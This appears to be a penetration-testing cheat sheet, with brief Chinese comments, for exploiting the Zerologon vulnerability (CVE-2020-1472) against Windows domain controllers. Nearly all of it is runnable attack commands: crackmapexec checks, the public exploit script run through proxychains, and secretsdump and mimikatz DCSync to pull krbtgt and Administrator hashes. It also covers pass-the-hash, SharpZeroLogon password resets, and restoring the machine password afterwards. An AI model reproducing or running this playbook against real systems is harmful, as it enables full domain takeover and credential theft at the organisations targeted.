crackmapexec smb 10.10.10.10 -u username -p password -d domain -M zerologon

git clone https://github.com/dirkjanm/CVE-2020-1472.git
激活一个虚拟环境来安装impacket
>python3 -m venv venv
>source venv/bin/activate
>pip3 install .
>proxychains python3 cve-2020-1472-exploit.py DC01 172.16.1.5
查找 DC 的旧 NT 哈希
>proxychains secretsdump.py -history -just-dc-user 'DC01$' -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'CORP/DC01$@DC01.CORP.LOCAL'
从 secretsdump 恢复密码
将本地注册表机密转储到最新版本时,secretsdump 将自动转储明文机器密码（十六进制编码）
python restorepassword.py CORP/DC01@DC01.CORP.LOCAL -target-ip 172.16.1.5 -hexpass e6ad4c4f64e71cf8c8020aa44bbd70ee711b8dce2adecd7e0d7fd1d76d70a848c987450c5be97b230bd144f3c3
deactivate

>git clone https://github.com/nccgroup/nccfsas
检查
>execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local
重置机器账户密码
>execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -reset
从一个没加入域的机器测试
>execute-assembly SharpZeroLogon.exe win-dc01.vulncorp.local -patch

privilege::debug
检查
lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$
执行，并且设置密码为空
lsadump::zerologon /target:DC01.LAB.LOCAL /account:DC01$ /exploit
执行dcsync导出hash
lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:krbtgt /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
lsadump::dcsync /domain:LAB.LOCAL /dc:DC01.LAB.LOCAL /user:Administrator /authuser:DC01$ /authdomain:LAB /authpassword:"" /authntlm
PTH
sekurlsa::pth /user:Administrator /domain:LAB /rc4:HASH_NTLM_ADMIN
使用 IP 地址代替FQDN 用 Windows API 来强制 NTLM
重置密码为Waza1234/Waza1234/Waza1234/
# https://github.com/gentilkiwi/mimikatz/blob/6191b5a8ea40bbd856942cbc1e48a86c3c505dd3/mimikatz/modules/kuhl_m_lsadump.c#L2584
lsadump::postzerologon /target:10.10.10.10 /account:DC01$